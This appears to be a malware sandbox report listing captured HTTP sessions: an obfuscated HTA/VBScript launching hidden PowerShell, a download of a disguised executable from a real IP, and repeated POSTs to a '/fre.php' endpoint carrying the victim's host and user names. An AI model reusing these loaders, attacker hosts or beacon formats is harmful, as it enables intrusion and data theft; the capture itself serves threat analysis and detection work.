                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: 66.63.187.231
                                                    Connection: Keep-Alive
                                                    Nov 20, 2024 11:08:01.107028008 CET1236INHTTP/1.1 200 OK
                                                    Date: Wed, 20 Nov 2024 10:08:00 GMT
                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                    Last-Modified: Wed, 20 Nov 2024 01:52:14 GMT
                                                    ETag: "5c04-6274e6620b225"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 23556
                                                    Keep-Alive: timeout=5, max=100
                                                    Connection: Keep-Alive
                                                    Content-Type: application/hta
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 6d 75 6c 61 74 65 49 45 38 22 20 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 53 63 52 69 70 54 20 4c 41 4e 47 75 61 67 45 3d 22 76 42 73 63 52 49 70 54 22 3e 0d 0a 44 49 6d 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" ><html><body><ScRipT LANGuagE="vBscRIpT">DImtzHLdKvsEcRWyQFPNHoyTeRtKqrFUgUlAoRyLWkDbyxAAzslucnYWlBayRmyLBfwwVLvflcYiZZEpfzNUcHCcwlZBMnkhugupWLqSGPRjiRWzLULwlRXTOODbDPFQNUvpSkWIiuwlAwrOtAtidmZdngahQoxtJqNCmFehSLdxChEPdkYlgmxnXjGbbfCAhnKlFqCZNLZaRvxkRURPVoeiRQJQNIGSlJCzyNdRVnAdTGK
                                                    Nov 20, 2024 11:08:01.107296944 CET224INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                    Data Ascii: ,
                                                    Nov 20, 2024 11:08:01.107309103 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                    Data Ascii: suiePMvPIuVcNMhTeJ
                                                    Nov 20, 2024 11:08:01.107949018 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                    Data Ascii: tzHLdKvsEcRW
                                                    Nov 20, 2024 11:08:01.107959986 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                    Data Ascii:
                                                    Nov 20, 2024 11:08:01.107976913 CET672INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 22 53 43 52 69 50 54 2e 53 48 45 4c 4c 22 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                    Data Ascii: "SCRiPT.SHELL"
                                                    Nov 20, 2024 11:08:01.109575033 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                    Data Ascii: :
                                                    Nov 20, 2024 11:08:01.109586000 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 22 70 6f 57 65 72 73 68 45 4c 6c 2e 45 78 45 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                    Data Ascii: "poWershELl.ExE -eX bypAss -nOP -W 1
                                                    Nov 20, 2024 11:08:01.109596968 CET1236INData Raw: 67 49 43 41 67 49 43 41 67 63 30 74 33 61 46 4e 56 5a 30 5a 6b 4b 54 73 6e 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 4c 57 35 68 54 55 55 67 49 43 41 67 49
                                                    Data Ascii: gICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVm
                                                    Nov 20, 2024 11:08:01.109606981 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 74 7a 48 4c 64 4b 76 73 45 63 52 57 79 51 46 50 4e 48 6f 79 54 65 52 74 4b 71 72 46 55 67 55 6c 41 6f 52 79 4c 57 6b 44 62 79 78 41 41 7a 73 6c 75 63 6e
                                                    Data Ascii: tzHLdKvsEcRWyQFPNHoyTeRtKqrFUgUlAoRyLWkDbyxAAzslucnYWlBayRmyLBfwwVLvflcYiZZEpfzNUcHCcwlZBMnkhugupWLqSGPRjiRWzLULwlRXTOODbDPFQNUvpSkWIiuwlAwrOtAtidmZdngahQoxtJqNCmFehSLdxChEPdkYlgmxnXjGbbfCAhnKlFqCZNLZaRvxkRURPVoe
                                                    Nov 20, 2024 11:08:01.119070053 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 33 34 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                    Data Ascii: 34


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.224916466.63.187.231803488C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:08.511482000 CET313OUTGET /33/caspol.exe HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: 66.63.187.231
                                                    Connection: Keep-Alive
                                                    Nov 20, 2024 11:08:09.357212067 CET1236INHTTP/1.1 200 OK
                                                    Date: Wed, 20 Nov 2024 10:08:09 GMT
                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                    Last-Modified: Wed, 20 Nov 2024 01:27:09 GMT
                                                    ETag: "92a00-6274e0c657f44"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 600576
                                                    Keep-Alive: timeout=5, max=100
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-msdownload
                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed 3a 3d 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 08 09 00 00 20 00 00 00 00 00 00 e6 26 09 00 00 20 00 00 00 40 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 09 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 26 09 00 4f 00 00 00 00 40 09 00 7c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL:=g0 & @@ `&O@|` H.text `.rsrc|@@@.reloc`(@B&H6(^(}{rp o5{o7&*0{o9}&*0to{{rp(o:+%{oo;o&Xi2{o<&{o=*+E\b2{oA*n(}}(*0
                                                    Nov 20, 2024 11:08:09.357271910 CET1236INData Raw: 00 be 00 00 00 03 00 00 11 02 7b 07 00 00 04 6f 1a 00 00 0a 17 8d 33 00 00 01 25 16 1f 3b 9d 6f 1b 00 00 0a 0a 02 7b 09 00 00 04 6f 1a 00 00 0a 0b 73 1c 00 00 0a 0c 02 7b 03 00 00 04 06 07 08 6f 03 00 00 06 2c 69 72 35 00 00 70 0d 08 6f 1d 00 00
                                                    Data Ascii: {o3%;o{os{o,ir5po+(r5p(( -o!r9p(("&{o#{o#+rap("&&(*L$p.0#{
                                                    Nov 20, 2024 11:08:09.357317924 CET1236INData Raw: 00 00 0a 02 7b 0b 00 00 04 1e 1d 1e 1d 73 32 00 00 0a 6f 33 00 00 0a 02 7b 0b 00 00 04 72 b9 01 00 70 6f 34 00 00 0a 02 7b 0b 00 00 04 20 c8 00 00 00 1f 37 73 35 00 00 0a 6f 36 00 00 0a 02 7b 0b 00 00 04 1b 6f 37 00 00 0a 02 7b 0b 00 00 04 72 d3
                                                    Data Ascii: {s2o3{rpo4{ 7s5o6{o7{rpo8{o<{s:o="A"As>(?(@ ] s5(A(B{oC(B{oC(B{oC(B{oC
                                                    Nov 20, 2024 11:08:09.357697010 CET1236INData Raw: 00 1f 20 73 35 00 00 0a 6f 36 00 00 0a 02 7b 11 00 00 04 1b 6f 37 00 00 0a 02 7b 11 00 00 04 72 53 03 00 70 6f 38 00 00 0a 20 2b 23 00 00 28 4f 00 00 0a 06 72 65 03 00 70 6f 44 00 00 0a 75 03 00 00 1b 0b 28 50 00 00 0a 72 6f 03 00 70 6f 51 00 00
                                                    Data Ascii: s5o6{o7{rSpo8 +#(OrepoDu(PropoQiI((8a_X ]X __`aX _EE(X _{a
                                                    Nov 20, 2024 11:08:09.357734919 CET1236INData Raw: 16 00 00 04 2d 1e 72 27 04 00 70 d0 06 00 00 02 28 29 00 00 0a 6f 62 00 00 0a 73 63 00 00 0a 80 16 00 00 04 7e 16 00 00 04 2a 1a 7e 17 00 00 04 2a 1e 02 80 17 00 00 04 2a 6a 28 18 00 00 06 72 67 04 00 70 7e 17 00 00 04 6f 64 00 00 0a 74 26 00 00
                                                    Data Ascii: -r'p()obsc~*~**j(rgp~odt&*j(rp~odt&*j(rp~odt&*j(rp~odt&*j(rp~odt&*~*(e*Vs!(ft*0{
                                                    Nov 20, 2024 11:08:09.357770920 CET1236INData Raw: a7 05 00 70 a2 25 17 72 af 05 00 70 a2 28 31 00 00 06 2d 07 06 73 42 00 00 06 7a 06 2a 4a 02 72 b7 05 00 70 28 33 00 00 06 02 28 34 00 00 06 2a be 02 72 c1 05 00 70 28 33 00 00 06 02 02 28 34 00 00 06 17 8d 31 00 00 01 25 16 72 a7 05 00 70 a2 28
                                                    Data Ascii: p%rp(1-sBz*Jrp(3(4*rp(3(41%rp(1,}*0Crpsvowox,(oy+(z,*Xi2*0(4(1-sBz*0Z{,Frp
                                                    Nov 20, 2024 11:08:09.358474016 CET1236INData Raw: 0c 41 00 01 00 01 00 01 00 10 00 cc 01 9b 0c 49 00 03 00 05 00 01 00 10 00 a2 08 9b 0c 49 00 0c 00 0d 00 80 01 10 00 1b 07 9b 0c 41 00 16 00 16 00 00 00 10 00 43 0a c4 0a 41 00 16 00 17 00 00 01 10 00 14 0b c4 0a a5 00 18 00 20 00 01 00 10 00 91
                                                    Data Ascii: AIIACA iA#i5iyBL=PSAW[_c_cg2gS1PP[__4coc%g
                                                    Nov 20, 2024 11:08:09.358510971 CET1236INData Raw: 00 00 00 01 00 97 08 00 00 01 00 3e 02 00 00 02 00 78 01 00 00 01 00 c4 0b 00 00 02 00 d8 01 00 00 03 00 84 0c 00 00 01 00 c6 0c 00 00 02 00 42 07 00 00 01 00 e5 08 00 00 02 00 54 05 00 00 01 00 e5 08 00 00 02 00 54 05 00 00 01 00 e5 08 00 00 02
                                                    Data Ascii: >xBTTTTTT$49O>x8Cx
                                                    Nov 20, 2024 11:08:09.358546019 CET1236INData Raw: 00 63 00 95 03 2e 00 6b 00 bf 03 2e 00 73 00 cc 03 49 00 9b 00 5e 03 c3 00 83 00 1b 04 c3 00 8b 00 16 04 c3 00 93 00 16 04 e3 00 93 00 16 04 e3 00 83 00 5d 04 c0 02 7b 00 16 04 27 00 2b 00 49 00 8d 00 0a 01 0f 01 15 01 1b 01 1f 01 b3 01 ce 01 df
                                                    Data Ascii: c.k.sI^]{'+I~%u++++++o1 3k:"8
                                                    Nov 20, 2024 11:08:09.359302044 CET1236INData Raw: 74 65 00 44 65 62 75 67 67 65 72 4e 6f 6e 55 73 65 72 43 6f 64 65 41 74 74 72 69 62 75 74 65 00 44 65 62 75 67 67 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 45 64 69 74 6f 72 42 72 6f 77 73 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 43 6f 6d 56 69
                                                    Data Ascii: teDebuggerNonUserCodeAttributeDebuggableAttributeEditorBrowsableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDes
                                                    Nov 20, 2024 11:08:09.387171030 CET1236INData Raw: 74 6f 6e 00 52 75 6e 00 6d 61 69 6c 54 6f 00 52 63 70 74 54 6f 00 4d 65 74 68 6f 64 49 6e 66 6f 00 43 75 6c 74 75 72 65 49 6e 66 6f 00 42 69 74 6d 61 70 00 53 77 61 70 00 53 6c 65 65 70 00 68 65 6c 70 00 4e 6f 6f 70 00 73 65 74 5f 54 61 62 53 74
                                                    Data Ascii: tonRunmailToRcptToMethodInfoCultureInfoBitmapSwapSleephelpNoopset_TabStopISmtp_smtpGroupStartupClearset_UseSystemPasswordCharInvokeMemberStringBuildersenderBinderget_ResourceManagerComponentResourceManagerFormClosedEven


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.224916594.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:17.118997097 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 176
                                                    Connection: close
                                                    Nov 20, 2024 11:08:17.124070883 CET176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: 'ckav.ruAlbus468325ALBUS-PCk0DE4229FCF97F5879F50F8FD39Qaje
                                                    Nov 20, 2024 11:08:17.823625088 CET185INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:17 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.224916694.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:17.928706884 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 176
                                                    Connection: close
                                                    Nov 20, 2024 11:08:17.934139013 CET176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: 'ckav.ruAlbus468325ALBUS-PC+0DE4229FCF97F5879F50F8FD3U1oER
                                                    Nov 20, 2024 11:08:18.691222906 CET185INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:18 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.224916794.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:18.838438034 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:18.846126080 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:19.578393936 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:19 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.224916894.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:19.729424000 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:19.737168074 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:20.483329058 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:20 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.224916994.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:20.639606953 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:20.648932934 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:21.399564981 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:21 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.224917094.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:21.556432962 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:21.561434984 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:22.424345016 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:22 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.224917194.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:22.579590082 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:22.587776899 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:23.353054047 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:23 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.224917294.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:23.780766964 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:23.789921999 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:24.467380047 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:24 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.224917394.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:24.624708891 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
